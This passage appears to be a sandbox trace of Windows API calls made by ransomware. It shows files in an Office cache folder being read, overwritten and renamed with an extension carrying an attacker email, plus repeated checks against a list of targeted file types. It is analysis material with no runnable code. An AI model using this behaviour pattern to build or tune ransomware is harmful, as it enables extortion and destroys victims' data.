lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.588] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x30380dd, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.588] WriteFile (in: hFile=0x1e8, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.590] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x432d940 | out: hHeap=0xb10000) returned 1 [0045.590] CloseHandle (hObject=0x1e8) returned 1 [0045.590] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0045.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0045.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0045.591] lstrlenW (lpString=".doc") returned 4 [0045.591] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.591] lstrlenW (lpString=".docx") returned 5 [0045.591] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0045.591] lstrlenW (lpString=".pdf") returned 4 [0045.591] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.591] lstrlenW (lpString=".xls") returned 4 [0045.591] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.591] lstrlenW (lpString=".xlsx") returned 5 [0045.591] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0045.591] lstrlenW (lpString=".ppt") returned 4 [0045.591] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0045.591] lstrlenW (lpString=".zip") returned 4 [0045.591] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.591] lstrlenW (lpString=".rar") returned 4 [0045.591] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.591] lstrlenW (lpString=".bz2") returned 4 [0045.591] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.591] lstrlenW (lpString=".7z") returned 3 [0045.591] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0045.591] lstrlenW (lpString=".dbf") returned 4 [0045.591] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0045.591] lstrlenW (lpString=".1cd") returned 4 [0045.591] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0045.591] lstrlenW (lpString=".jpg") returned 4 [0045.591] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.592] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0045.592] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0045.592] lstrlenW (lpString=".doc") returned 4 [0045.592] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.592] lstrlenW (lpString=".docx") returned 5 [0045.592] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0045.592] lstrlenW (lpString=".pdf") returned 4 [0045.592] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.592] lstrlenW (lpString=".xls") returned 4 [0045.592] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.592] lstrlenW (lpString=".xlsx") returned 5 [0045.592] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0045.592] lstrlenW (lpString=".ppt") returned 4 [0045.592] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.592] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0045.592] lstrlenW (lpString=".zip") returned 4 [0045.592] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.592] lstrlenW (lpString=".rar") returned 4 [0045.592] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.592] lstrlenW (lpString=".bz2") returned 4 [0045.592] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.592] lstrlenW (lpString=".7z") returned 3 [0045.592] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.592] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0045.592] lstrlenW (lpString=".dbf") returned 4 [0045.592] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.592] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0045.592] lstrlenW (lpString=".1cd") returned 4 [0045.592] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.592] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 74 [0045.592] lstrlenW (lpString=".jpg") returned 4 [0045.592] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.593] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0045.593] lstrlenW (lpString="OnoteLR.cab") returned 11 [0045.593] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0045.593] GetFileSizeEx (in: hFile=0x1e8, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=17456632) returned 1 [0045.593] CloseHandle (hObject=0x1e8) returned 1 [0045.593] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab")) returned 0x2020 [0045.593] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0045.593] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0045.594] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0045.594] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc6c | out: lpNewFilePointer=0x0) returned 1 [0045.594] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.594] ReadFile (in: hFile=0x1e8, lpBuffer=0x40c0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x40c0058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.759] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x58c9fd, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.759] ReadFile (in: hFile=0x1e8, lpBuffer=0x4100058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x4100058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.762] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x38bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0045.762] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x1065df8, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0045.762] ReadFile (in: hFile=0x1e8, lpBuffer=0x4140058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x4140058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0045.777] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0045.777] WriteFile (in: hFile=0x1e8, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x38bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0045.792] SetEndOfFile (hFile=0x1e8) returned 1 [0045.793] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x4a10048 [0045.797] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.797] WriteFile (in: hFile=0x1e8, lpBuffer=0x4a10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x4a10048*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.798] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x58c9fd, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.798] WriteFile (in: hFile=0x1e8, lpBuffer=0x4a10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x4a10048*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.799] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x1065df8, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0045.799] WriteFile (in: hFile=0x1e8, lpBuffer=0x4a10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x4a10048*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0045.801] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a10048 | out: hHeap=0xb10000) returned 1 [0045.801] CloseHandle (hObject=0x1e8) returned 1 [0045.801] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0045.801] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0045.801] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0045.801] lstrlenW (lpString=".doc") returned 4 [0045.801] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.801] lstrlenW (lpString=".docx") returned 5 [0045.801] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0045.801] lstrlenW (lpString=".pdf") returned 4 [0045.801] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.801] lstrlenW (lpString=".xls") returned 4 [0045.801] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.801] lstrlenW (lpString=".xlsx") returned 5 [0045.801] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0045.801] lstrlenW (lpString=".ppt") returned 4 [0045.801] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.801] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0045.802] lstrlenW (lpString=".zip") returned 4 [0045.802] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.802] lstrlenW (lpString=".rar") returned 4 [0045.802] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.802] lstrlenW (lpString=".bz2") returned 4 [0045.802] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.802] lstrlenW (lpString=".7z") returned 3 [0045.802] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0045.802] lstrlenW (lpString=".dbf") returned 4 [0045.802] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0045.802] lstrlenW (lpString=".1cd") returned 4 [0045.802] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0045.802] lstrlenW (lpString=".jpg") returned 4 [0045.802] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0045.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0045.802] lstrlenW (lpString=".doc") returned 4 [0045.802] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0045.802] lstrlenW (lpString=".docx") returned 5 [0045.802] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0045.802] lstrlenW (lpString=".pdf") returned 4 [0045.802] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0045.802] lstrlenW (lpString=".xls") returned 4 [0045.802] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0045.802] lstrlenW (lpString=".xlsx") returned 5 [0045.802] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0045.802] lstrlenW (lpString=".ppt") returned 4 [0045.802] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0045.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0045.802] lstrlenW (lpString=".zip") returned 4 [0045.803] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0045.803] lstrlenW (lpString=".rar") returned 4 [0045.803] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0045.803] lstrlenW (lpString=".bz2") returned 4 [0045.803] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0045.803] lstrlenW (lpString=".7z") returned 3 [0045.803] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0045.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0045.803] lstrlenW (lpString=".dbf") returned 4 [0045.803] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0045.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0045.803] lstrlenW (lpString=".1cd") returned 4 [0045.803] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0045.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74 [0045.803] lstrlenW (lpString=".jpg") returned 4 [0045.803] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0045.803] lstrcmpiW (lpString1=".cab", lpString2=".php") returned -1 [0046.193] lstrlenW (lpString="ProjLR.cab") returned 10 [0046.193] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0046.465] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=8265165) returned 1 [0046.465] CloseHandle (hObject=0x1c0) returned 1 [0046.465] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab")) returned 0x2020 [0046.465] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.465] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0046.594] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0046.594] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc6c | out: lpNewFilePointer=0x0) returned 1 [0046.594] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0046.594] ReadFile (in: hFile=0x1c0, lpBuffer=0x40c0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x40c0058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.606] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x2a09ef, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0046.606] ReadFile (in: hFile=0x1c0, lpBuffer=0x4100058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x4100058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.653] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x38bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0046.653] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x7a1dcd, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0046.653] ReadFile (in: hFile=0x1c0, lpBuffer=0x4140058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x4140058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.668] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0046.668] WriteFile (in: hFile=0x1c0, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x38bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0046.690] SetEndOfFile (hFile=0x1c0) returned 1 [0046.690] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x4a10048 [0046.690] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0046.690] WriteFile (in: hFile=0x1c0, lpBuffer=0x4a10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x4a10048*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.692] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x2a09ef, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0046.692] WriteFile (in: hFile=0x1c0, lpBuffer=0x4a10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x4a10048*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.835] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x7a1dcd, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0046.835] WriteFile (in: hFile=0x1c0, lpBuffer=0x4a10048*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x4a10048*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0046.837] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x4a10048 | out: hHeap=0xb10000) returned 1 [0046.837] CloseHandle (hObject=0x1c0) returned 1 [0046.838] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0046.838] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.838] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.838] lstrlenW (lpString=".doc") returned 4 [0046.838] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0046.838] lstrlenW (lpString=".docx") returned 5 [0046.838] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0046.838] lstrlenW (lpString=".pdf") returned 4 [0046.838] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0046.838] lstrlenW (lpString=".xls") returned 4 [0046.838] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0046.838] lstrlenW (lpString=".xlsx") returned 5 [0046.838] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0046.838] lstrlenW (lpString=".ppt") returned 4 [0046.838] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0046.838] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.838] lstrlenW (lpString=".zip") returned 4 [0046.838] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0046.838] lstrlenW (lpString=".rar") returned 4 [0046.838] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0046.838] lstrlenW (lpString=".bz2") returned 4 [0046.838] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0046.838] lstrlenW (lpString=".7z") returned 3 [0046.838] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0046.838] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.838] lstrlenW (lpString=".dbf") returned 4 [0046.838] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0046.838] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.838] lstrlenW (lpString=".1cd") returned 4 [0046.839] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0046.839] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.839] lstrlenW (lpString=".jpg") returned 4 [0046.839] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0046.839] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.839] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.839] lstrlenW (lpString=".doc") returned 4 [0046.839] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0046.839] lstrlenW (lpString=".docx") returned 5 [0046.839] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0046.839] lstrlenW (lpString=".pdf") returned 4 [0046.839] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0046.839] lstrlenW (lpString=".xls") returned 4 [0046.839] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0046.839] lstrlenW (lpString=".xlsx") returned 5 [0046.839] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0046.839] lstrlenW (lpString=".ppt") returned 4 [0046.839] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0046.839] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.839] lstrlenW (lpString=".zip") returned 4 [0046.839] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0046.839] lstrlenW (lpString=".rar") returned 4 [0046.839] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0046.839] lstrlenW (lpString=".bz2") returned 4 [0046.839] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0046.839] lstrlenW (lpString=".7z") returned 3 [0046.839] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0046.839] lstrlenW (lpString="C:\\MSOCache\\All 